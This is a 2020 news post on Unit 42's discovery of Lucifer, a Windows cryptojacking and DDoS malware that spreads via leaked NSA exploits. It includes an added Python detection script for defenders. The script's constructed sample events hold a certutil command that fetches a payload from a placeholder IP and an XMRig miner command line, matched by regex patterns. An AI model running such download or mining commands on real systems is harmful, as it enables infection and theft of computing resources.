Monday, June 29, 2020

The Lucifer malware also mines Monero cryptocurrency on infected devices, and it can drop and run leaked NSA (National Security Agency, the US national intelligence agency) exploits, including DoublePulsar, EternalBlue and EternalRomance, against vulnerable devices to spread across the intranet.

Palo Alto Networks’ Unit 42 researchers have discovered a new version of a “hybrid crypto-jacking malware,” which they have dubbed “Lucifer.”
Lucifer malware is capable of launching DDoS attacks and can attack vulnerable Windows hosts using a variety of flaws of a “trivial-to-exploit nature,” most of which are rated ‘high’ or ‘critical.’
The first wave of this campaign was blocked by Palo Alto Networks on 10 June 2020, but the attacker resumed the campaign the very next day with an upgraded version of Lucifer. The campaign is still active and wreaking havoc by targeting Windows computers to mine cryptocurrency and launch intense DDoS attacks.
Palo Alto Networks’ researchers observed that the new variant of Lucifer is immensely powerful: it performs crypto-jacking by dropping XMRig to mine Monero, connects to a C&C server, and self-propagates by exploiting multiple vulnerabilities and brute-forcing credentials.
Furthermore, it can drop and run leaked NSA exploits, including DoublePulsar, EternalBlue and EternalRomance, against vulnerable devices to enable intranet infection.
“Once exploited, the attacker can execute arbitrary commands on the vulnerable device. In this case, the targets are Windows hosts on both the internet and intranet, given that the attacker is leveraging certutil utility in the payload for malware propagation,” the researchers said in a blog post.
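The researchers' note that certutil is used in the payload to fetch the malware, together with the XMRig miner drop described above, gives defenders two process-level signals worth alerting on. The following is an added example, not code from the Unit 42 report or from Lucifer itself; the events are constructed, the URL and file names are placeholders, and the certutil (-urlcache -split -f) and XMRig (-o, --algo, --donate-level) switches are assumed from public documentation of those tools rather than from this page:

```python
import re

# Constructed process-creation events for illustration only; none of these
# values are real Lucifer indicators.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.7/payload.exe C:\\Users\\Public\\p.exe"},
    {"host": "ws01", "image": r"C:\Users\Public\p.exe",
     "cmdline": "p.exe -o pool.example.invalid:3333 --algo rx/0 --donate-level 0"},
    {"host": "ws02", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -verify C:\\certs\\server.cer"},   # benign admin use
]

# certutil fetching from a URL (its -urlcache switch) is the LOLBin download pattern.
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b.*https?://", re.IGNORECASE)
# Typical XMRig-style command-line switches: pool target with port, RandomX algo, donation level.
MINER_ARGS = re.compile(r"(--donate-level|--algo\s+rx/|-o\s+\S+:\d{2,5}\b)", re.IGNORECASE)


def classify(event):
    """Return the list of detection names that fire for one process-creation event."""
    image = event["image"].lower()
    cmd = event["cmdline"]
    findings = []
    if image.endswith("certutil.exe") and CERTUTIL_DOWNLOAD.search(cmd):
        findings.append("certutil-download")
    if MINER_ARGS.search(cmd):
        findings.append("miner-cmdline")
    return findings


def scan(events):
    """Run every event through classify() and return (host, detection) pairs."""
    return [(e["host"], f) for e in events for f in classify(e)]


if __name__ == "__main__":
    for host, finding in scan(SAMPLE_EVENTS):
        print(f"{host}: {finding}")
```

The benign `certutil -verify` event is deliberately included so the rule only fires on the download form, not on every certutil invocation.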


NSA exploits in action:

The malware developer named it Satan DDoS, but since Satan ransomware already exists, Palo Alto researchers chose to name it Lucifer.
The good news is that patches for the weaponized vulnerabilities are already available, but hosts that have not yet been updated remain exposed to crypto-jacking. Researchers urge users to apply the latest patches and updates immediately to secure their devices.
